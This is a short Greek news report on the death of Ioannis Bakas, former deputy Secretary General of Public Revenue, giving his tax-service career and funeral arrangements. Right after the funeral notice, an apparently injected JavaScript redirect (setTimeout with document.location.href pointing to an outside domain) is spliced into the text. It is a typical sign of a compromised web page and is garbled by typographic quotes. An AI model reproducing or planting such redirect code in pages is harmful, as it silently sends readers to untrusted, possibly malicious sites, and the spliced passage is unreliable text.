Πέθανε ο πρώην αναπληρωτής γ.γ Δημοσίων Εσόδων Ι.Μπάκας

0
7

 

          Σε ηλικία 60 ετών πέθανε ο Επίτιμος Γενικός Διευθυντής Φορολογικής Διοίκησης και πρώην αναπληρωτής Γενικός Γραμματέας Δημοσίων Εσόδων Ιωάννης Μπάκας.

Ο Ι. Μπάκας υπηρέτησε ως εφοριακός από το 1990, στη ΔΟΥ Δάφνης και, στη συνέχεια, στη ΦΑΕ Πειραιά, στο ΣΔΟΕ Αττικής, στο Περιφερειακό Ελεγκτικό Κέντρο Αθηνών, στις ΔΟΥ Πόρου, ΙΒ’ Αθηνών, ΦΑΕΕ Αθηνών και στη Γενική Διεύθυνση Φορολογικής Διοίκησης, μέχρι και την 1η Σεπτεμβρίου της εφετινής χρονιάς, οπότε και συνταξιοδοτήθηκε, έχοντας βαθμό Α.

Από το 2004, υπηρετούσε σε θέσεις Προϊσταμένου Διευθύνσεων, ενώ, το 2015, παράλληλα με τη θέση του προϊσταμένου της Γενικής Διεύθυνσης Φορολογικής Διοίκησης, διετέλεσε και αναπληρωτής γενικός γραμματέας Δημοσίων Εσόδων.

Ο γενικός γραμματέας Δημοσίων Εσόδων Γιώργος Πιτσιλής και όλοι οι εργαζόμενοι στη ΓΓΔΕ εκφράζουν τη βαθιά τους θλίψη για την απώλεια του συναδέλφου τους και τα συλλυπητήριά τους στην οικογένεια του εκλιπόντος.

Η εξόδιος ακολουθία θα τελεστεί την Παρασκευή, 14 Οκτωβρίου, στις 10:00, στον Iερό Nαό του Αγίου Δημητρίου, στον Βύρωνα και η κηδεία στην ιδιαίτερη πατρίδα του. setTimeout(«document.location.href=’http://gettop.info/kt/?53vSkc&'», delay);

ΑΦΗΣΤΕ ΜΙΑ ΑΠΑΝΤΗΣΗ

Please enter your comment!
Please enter your name here